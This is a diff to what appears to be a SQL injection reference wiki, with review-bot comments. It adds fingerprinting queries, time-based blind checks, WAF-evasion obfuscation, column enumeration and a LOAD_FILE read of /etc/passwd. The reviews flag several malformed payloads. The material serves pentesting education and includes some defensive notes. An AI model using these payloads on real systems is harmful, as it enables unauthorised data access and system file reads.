diff --git a/_data/injectionDescriptions.yml b/_data/injectionDescriptions.yml
index c0a8ee5..cdf039b 100644
--- a/_data/injectionDescriptions.yml
+++ b/_data/injectionDescriptions.yml
@@ -1,14 +1,14 @@
injectionDetection: Injections can be detected in a number of ways. The simplest being adding a '
or "
after various parameters and getting a database error returned from the web server. The sections below describe where to find and how to detect these parameters.
dbmsIdentification: Detecting what Database Management System (DBMS) is being used is critical in being able to further exploit an injection. Without that knowledge it would not be possible to determine what tables to query, what functions are built-in, and what detections to avoid. A successful response from the below queries identify that the selected DBMS is being used.
errorBased: Error based injections are exploited through triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results, or gain information on how to restructure the query for further exploitation.
-unionBased: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns).
+unionBased: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). You can try to enumerate the amount of columns using error based enumeration (see error based injection).
blindBased: Blind SQL injection is one of the more advanced methods of injection. The Partial-Blind and Full-Blind methods are detailed below. Use care when performing these queries, as they can overload a server if performed through heavy automation.
conditionalStatements: Conditional statements are beneficial for creating complex queries and aiding in Blind Injection.
injectionPlacement: SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.
injectionObfuscation: Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations, they may require modification before being applied to certain injections.
-dataExfiltration: Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various Layer 4 requests, and hidden techniques.
+dataExfiltration: Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.
dataTargeting: Being able to properly target and identify sensitive information can exponentially decrease time spent in a database. This means less time spent poking around and more time spent researching other vectors.
-executingOSCommands: Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
+executingOSCommands: Running OS commands is one of the primary objectives of SQL injection - this aids in getting full control of the host OS. This may happen by directly executing commands, modifying existing data to put a shell on a webpage, or exploiting hidden functionality in the database.
informationGathering: It is often valuable to gather information about any testing environment; version numbers, user accounts, and databases all help in escalating vulnerabilities. Below are common methods for this.
lateralMovement: Lateral movement allows a tester to gain access to different sets of functionality/data that don't explicitly require a more privileged user. Switching user accounts laterally will expose different information and could aid in compromising a more privileged user.
privilegeEscalation: Certain functionalities require a privileged user and for escalating a vulnerability a privileged user is always the first step.
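Review bot: on the new `unionBased` sentence, "amount of columns" should be "number of columns", and pointing the reader at "error based enumeration" is misleading in the sense this page uses the term: the ORDER BY / UNION SELECT counting methods watch whether the query errors at all, they do not leak data through error text. Suggest: "You can find the number of columns by incrementing `ORDER BY n` or `UNION SELECT 1,2,...` until the query errors (see the Error Based section)." On the `executingOSCommands` line the bare hyphen now joins two independent clauses; a semicolon reads better: "...objectives of SQL injection; this aids in gaining full control of the host OS."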
diff --git a/assets/images/facebookCard.jpg b/assets/images/facebookCard.jpg
index 35fd767..d319612 100644
Binary files a/assets/images/facebookCard.jpg and b/assets/images/facebookCard.jpg differ
diff --git a/assets/images/favicon.ico b/assets/images/favicon.ico
new file mode 100644
index 0000000..99ae406
Binary files /dev/null and b/assets/images/favicon.ico differ
diff --git a/assets/images/logo.png b/assets/images/logo.png
new file mode 100644
index 0000000..a637522
Binary files /dev/null and b/assets/images/logo.png differ
diff --git a/assets/images/twitterCard.jpg b/assets/images/twitterCard.jpg
index c4802f7..273e053 100644
Binary files a/assets/images/twitterCard.jpg and b/assets/images/twitterCard.jpg differ
diff --git a/attackQueries/dataTargeting/oracle.html b/attackQueries/dataTargeting/oracle.html
index e8079c8..05a5b25 100644
--- a/attackQueries/dataTargeting/oracle.html
+++ b/attackQueries/dataTargeting/oracle.html
@@ -21,7 +21,7 @@
Data Targeting queries
SELECT * FROM session_privs SELECT * FROM USER_SYS_PRIVS SELECT * FROM USER_TAB_PRIVS SELECT * FROM USER_TAB_PRIVS_MADE SELECT * FROM USER_TAB_PRIVS_RECD SELECT * FROM ALL_TAB_PRIVS SELECT * FROM USER_ROLE_PRIVS
|
- Extracting stored procedure/Java sources |
+ Extracting Stored Procedure/Java Sources |
SELECT * FROM all_source WHERE owner NOT IN ('SYS','SYSTEM') SELECT * FROM all_source WHERE TYPE LIKE '%JAVA %' SELECT TO_CHAR(DBMS_METADATA.get_ddl('TABLE','DEPT','CONSUELA')) FROM dual |
diff --git a/attackQueries/executingOSCommands/index.html b/attackQueries/executingOSCommands/index.html
index 3e884f9..9a677c9 100644
--- a/attackQueries/executingOSCommands/index.html
+++ b/attackQueries/executingOSCommands/index.html
@@ -1,6 +1,6 @@
---
layout: tab
-description: Running OS commands is one of the primary objectives of SQL injection, this aids in getting full control of the host OS.
+description: Running OS commands is one of the primary objectives of SQL injection - this aids in getting full control of the host OS.
keywords: os command, operating system command, command injection
title: OS Commands | NetSPI SQL Injection Wiki
tabs:
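Review bot: this description is a verbatim copy of the `executingOSCommands` entry in `_data/injectionDescriptions.yml`, and the same wording fix (hyphen to semicolon) had to be applied in both places; consider having the tab layout read the data file so there is one source to keep in sync.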
diff --git a/attackQueries/executingOSCommands/mysql.html b/attackQueries/executingOSCommands/mysql.html
index b5cd81f..a483190 100644
--- a/attackQueries/executingOSCommands/mysql.html
+++ b/attackQueries/executingOSCommands/mysql.html
@@ -18,6 +18,9 @@ Executing OS Commands Through MySQL
Command Execution with MySQL CLI Access |
https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/ |
+
+ Traversing directories (Linux) |
+ SELECT load_file("/etc/passwd") from information_schema |
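Review bot: the new row title "Traversing directories (Linux)" does not match the query beside it, and the query is malformed. `LOAD_FILE()` returns the contents of a single file, not a directory listing, and `information_schema` is a schema, not a table, so `FROM information_schema` fails with an unknown-table error; the function needs no table at all (`SELECT LOAD_FILE('/etc/passwd')`). It is also a file read rather than OS command execution, so it belongs beside the file entries under Data Exfiltration, not in Executing OS Commands. Document the prerequisites the reader will run into: the account needs the FILE privilege and `secure_file_priv` must permit the path (on current defaults it is a single directory or NULL, which blocks the read). Those two settings are exactly what a defender should confirm are locked down.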
diff --git a/dbmsIdentification/mysql.html b/dbmsIdentification/mysql.html
index 11a03a4..703c2a5 100644
--- a/dbmsIdentification/mysql.html
+++ b/dbmsIdentification/mysql.html
@@ -21,6 +21,12 @@ DBMS Identification
String concatenation |
page.php?id=' 'mysql' -- |
+
+ Functions |
+ connection_id() --
+ row_count() --
+ POW(1,1) -- |
+
Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.php?id=' |
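Review bot: `POW(1,1)` in the new Functions row is a weak fingerprint because it is not MySQL-specific: `POW()` also exists in PostgreSQL and `POWER()` in Oracle and SQL Server, so a successful response does not discriminate; `CONNECTION_ID()` and `ROW_COUNT()` are the entries that actually identify MySQL. The row also drops the `page.php?id=` form every other row in this table uses, and the trailing `--` only comments in MySQL when followed by whitespace, so keep the space (or `--+` in a URL). Suggest one `page.php?id=... -- ` line per function to match the table.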
diff --git a/dbmsIdentification/oracle.html b/dbmsIdentification/oracle.html
index 9c91778..b67d2c9 100644
--- a/dbmsIdentification/oracle.html
+++ b/dbmsIdentification/oracle.html
@@ -13,6 +13,10 @@ DBMS Identification
String concatenation |
page.jsp?id='||'oracle' -- |
+
+
+ Functions |
+ BITAND(1,1) -- |
Default table |
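Review bot: `BITAND(1,1) --` is an expression fragment, and in Oracle every SELECT needs a FROM clause, so as written it cannot be run; the row should read `SELECT BITAND(1,1) FROM dual --`, or carry the `page.jsp?id=` prefix used by the row above it. Note also that BITAND is not unique to Oracle (Db2 and Snowflake have it), so it should be paired with the `dual` check for a reliable identification. Minor: two consecutive blank `+` lines are added where the neighbouring rows use one.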
diff --git a/dbmsIdentification/sqlserver.html b/dbmsIdentification/sqlserver.html
index ff0fa93..5bb7655 100644
--- a/dbmsIdentification/sqlserver.html
+++ b/dbmsIdentification/sqlserver.html
@@ -18,6 +18,16 @@ DBMS Identification
Default variable |
page.asp?id=sql'; SELECT @@SERVERNAME -- |
+
+ String concatenation |
+ page.php?id='mssql'+'mssql' -- |
+
+
+ Functions |
+ @@rowcount --
+ SQUARE(1) --
+ @@pack_received -- |
+
Error messages Note: Triggering DB errors through invalid syntax will sometimes return verbose error messages that include the DBMS name. |
page.asp?id=' |
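Review bot: the new string-concatenation payload does not parse. Following the pattern of the MySQL row (`page.php?id=' 'mysql' --`, which closes the original quote and then supplies a second literal), the SQL Server analogue is `page.asp?id='+'mssql' --`, producing `''+'mssql'`; the committed `'mssql'+'mssql'` yields `''mssql'+'mssql'`, a syntax error. The file name should also be `.asp` like the rows above, not `.php`. In the Functions row, `@@ROWCOUNT` and `@@PACK_RECEIVED` are good SQL Server-only signals and `SQUARE()` is specific too, but all three are bare fragments rather than the `page.asp?id=` form used elsewhere in this table.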
diff --git a/detection.html b/detection.html
index 5013907..7feeff2 100644
--- a/detection.html
+++ b/detection.html
@@ -93,7 +93,8 @@ Detecting Injections
Arithmetic |
- product.asp?id=1/1 -- true product.asp?id=1/0 -- false |
+ product.asp?id=1/1 -- true product.asp?id=1/0 -- false
+ product.asp?id=1/abs(1) -- true product.asp?id=1/abf(1) -- false |
Blind based Note: Detecting blind injection may require identification or guess-and-check of the DBMS to find the proper timing function. |
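Review bot: the new `1/abf(1)` case is labelled "false" but it is an error case: `abf` is not a function in any DBMS, so the server raises an unknown-function error rather than evaluating to false. That is still a useful detection signal (it proves the parameter reaches the SQL parser), but it is a different observation from `1/0`, which is a runtime result (and in MySQL division by zero yields NULL, not an error). Suggest labelling the pair "valid function / invalid function" or moving it next to the error-message rows so the reader knows which response to expect. The defensive reading is the same either way: a generic 500 page is as distinguishable from a 200 as a verbose error is.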
diff --git a/injectionTechniques/conditionalStatements/mysql.html b/injectionTechniques/conditionalStatements/mysql.html
index 7d79baa..2c5e5e6 100644
--- a/injectionTechniques/conditionalStatements/mysql.html
+++ b/injectionTechniques/conditionalStatements/mysql.html
@@ -14,9 +14,17 @@ Conditionals
If/Else |
SELECT IF(1=2,'true','false') |
+
+ If/Else (json) |
+ {"id"="xxx AND IF(length(database())=’1’, SLEEP(15),1)#”} If the database name's length is 1, database gets unresponsive with given miliseconds |
+
Logical OR |
SELECT 1 || 0 To see nuances of this operator go here |
+
+ AND (json) |
+ {"id"="xxx AND 1=1#"} True statement {"id"="xxx AND 1=2#"} False statement |
+
-
\ No newline at end of file
+
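Review bot: several problems in the two JSON rows. The payloads use `=` between key and value (`{"id"="xxx ..."}`), which is not JSON; a body the application would parse is `{"id":"xxx AND 1=1#"}`. The If/Else row contains typographic quotes (`’1’`, `”`) that will not be accepted if copied, and `length(database())=’1’` compares an integer to a string; `=1` is enough. The description is also wrong on units: `SLEEP(15)` pauses for seconds, not milliseconds, and the server is delayed, not "unresponsive", so: "If the database name's length is 1, the response is delayed by 15 seconds." Fix the "miliseconds" spelling with it. The trailing `-`/`+` pair only adds the missing newline at end of file.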
diff --git a/injectionTechniques/conditionalStatements/sqlserver.html b/injectionTechniques/conditionalStatements/sqlserver.html
index 5c978c5..95481ed 100644
--- a/injectionTechniques/conditionalStatements/sqlserver.html
+++ b/injectionTechniques/conditionalStatements/sqlserver.html
@@ -12,7 +12,7 @@ Conditionals
Case |
- SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END |
+ SELECT * FROM CASE WHEN 1=1 THEN 1 ELSE 0 END |
If/Else |
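Review bot: this change breaks a working query. `CASE ... END` is a scalar expression in T-SQL, not a table source, so `SELECT * FROM CASE WHEN 1=1 THEN 1 ELSE 0 END` is a syntax error; the original `SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END` was correct and should be restored.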
diff --git a/injectionTechniques/obfuscation/mysql.html b/injectionTechniques/obfuscation/mysql.html
index 0dcf1e0..3406d66 100644
--- a/injectionTechniques/obfuscation/mysql.html
+++ b/injectionTechniques/obfuscation/mysql.html
@@ -26,6 +26,10 @@ Obfuscating Queries
Hex > Int |
SELECT 0x20 + 0x40 |
+
+ Unhex/hex |
+ unhex(hex(user())) |
+
Bitwise AND |
SELECT 6 & 2 |
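Review bot: the new Unhex/hex row should follow the `SELECT ...` form of its neighbours (`SELECT UNHEX(HEX(USER()))`), and a one-line explanation would help: the round trip returns the original string, so the wrapping exists only to change the request's appearance to signature-based filters, which is the point of this page. That is also the hint for detection engineers: look for function nesting around identity transforms, not only for the bare keyword.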
@@ -72,7 +76,11 @@ Obfuscating Queries
Single line comment |
- SELECT 1 -- comments out rest of line SELECT 1 # comments out rest of line |
+ SELECT 1 -- comments out rest of line SELECT 1 # comments out rest of line SELECT 1 --+ - Comments out rest of the line SELECT 1 --+- - Comments out rest of the line SELECT 1 -- - - Comments out rest of the line SELECT 1 %00 - Comments out rest of the line |
+
+
+ In-line comment |
+ SEL/*_*/ECT * FR/*_*/OM |
No Spaces |
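Review bot: the extended single-line-comment row should be split into one entry per variant like the rows above, and the entries need a caveat about why they work: MySQL only treats `--` as a comment when whitespace follows it, so `--+`, `--+-` and `-- -` are URL-encoding tricks that supply that space (the `+` decodes to a space) rather than distinct comment syntaxes, and `%00` relies on the application or driver truncating at the NUL byte, which current drivers do not do. The new "In-line comment" row (`SEL/*_*/ECT * FR/*_*/OM`) is doubtful: MySQL treats a `/* */` comment as a token separator, so splitting a keyword this way normally yields `SEL ECT`; please verify on one of the sandboxes before publishing, or state which version or driver accepts it.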
@@ -94,6 +102,10 @@ Obfuscating Queries
Invalid Percent Encode |
%SEL%ECT * F%R%OM U%S%ERS |
+
+ character obfuscation |
+ SeLeCt * FrOm |
+
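Review bot: the row title "character obfuscation" is lower-case while the sibling titles are capitalised ("Invalid Percent Encode"), and it is imprecise; what is shown is keyword case variation, so "Mixed case" or "Case variation" describes it. Worth adding that it only matters against case-sensitive filters, since SQL keywords are case-insensitive in every DBMS covered on this page.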
diff --git a/injectionTypes/blindBased/mysql.html b/injectionTypes/blindBased/mysql.html
index 874da01..3bd5d9c 100644
--- a/injectionTypes/blindBased/mysql.html
+++ b/injectionTypes/blindBased/mysql.html
@@ -64,11 +64,11 @@ Full-Blind
User is root (Benchmark method) |
- SELECT IF(user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null) |
+ SELECT * from (user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null) |
Version is 5.x.x |
- SELECT IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null) |
+ SELECT * from (SUBSTRING(version(),1,1)=5,SLEEP(5),null) |
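Review bot: both rewritten queries are invalid and regress working entries. `SELECT * from (user() LIKE 'root@%', BENCHMARK(...), null)` is not SQL: a parenthesised comma list is not a derived table, and the conditional branching that made these time-based checks work came from `IF(cond, then, else)`. Restore `SELECT IF(user() LIKE 'root@%', BENCHMARK(5000000, ENCODE('Slow Down','by 5 seconds')), null)` and `SELECT IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null)`. While here, note in the row that `ENCODE()` was removed in MySQL 8.0, so the BENCHMARK variant only runs on older servers.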
diff --git a/injectionTypes/errorBased/mysql.html b/injectionTypes/errorBased/mysql.html
index 15b7f7d..53debef 100644
--- a/injectionTypes/errorBased/mysql.html
+++ b/injectionTypes/errorBased/mysql.html
@@ -11,6 +11,24 @@ Error Based
+
+ Amount of columns using ORDER BY |
+ ORDER BY 1
+
+ Add this at the end of your query
+ If you get no error you know ordering is working
+ Increment the number from 1 until you get an error. Then you know the amount of columns for this table
+ |
+
+
+ Amount of columns using UNION SELECT |
+ UNION SELECT 1,2
+
+ Add this at the end of your query
+ Add increment until you see a valid response, e.g. UNION SELECT 1,2,3
+ If you get no error you know union select is working. You can try to find the values on the page to see where the output goes.
+ |
+
XML Parse Error |
SELECT extractvalue(rand(),concat(0x3a,(select version()))) |
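Review bot: "Amount of columns" should be "Number of columns" in both row titles and in the explanation ("Then you know the number of columns"). The ORDER BY description is slightly off: ordering by a column position that does not exist is what raises the error, so the column count is the last value that did not error, not the one that did; say "Increment n until you get an error; the last n without an error is the column count." For the UNION SELECT row, tell the reader the column types must also be compatible (as the union description says) and that the column-count mismatch error is the signal they are watching for. Both rows exist to set up a UNION, so they belong on the Union Based page, with at most a cross-reference here. Minor: the double blank `+` lines between rows differ from the single blank the rest of the file uses.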
diff --git a/misc/contributors.html b/misc/contributors.html
index d8e390b..91de41b 100644
--- a/misc/contributors.html
+++ b/misc/contributors.html
@@ -16,4 +16,7 @@ Special thanks to our contributors:
Khai Tran (@k_tr4n)
Rafael Seferyan
Scott Sutherland (@_nullbind)
+ Sachin Wagh (@tigertigerboy07)
+ Anurag Kumar (@anukaal)
+ Matthias Altmann (@secf00tprint)
diff --git a/misc/sandboxes/sqlserver.html b/misc/sandboxes/sqlserver.html
index 4dd579d..1cbbf8b 100644
--- a/misc/sandboxes/sqlserver.html
+++ b/misc/sandboxes/sqlserver.html
@@ -3,5 +3,4 @@ Sandboxes
Some useful online sandboxes for testing queries can be found below:
http://sqlfiddle.com/
https://turbo.net/sql
- https://sqlzoo.net/
- http://www.headfirstlabs.com/sql_hands_on/
+ https://sqlzoo.net/
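Review bot: the `https://sqlzoo.net/` line is removed and re-added byte-for-byte, so this is a whitespace or line-ending change; if the intent is only to drop the headfirstlabs link, keep the diff to that single deletion so the change stays reviewable, and state the reason for removing the link in the commit message.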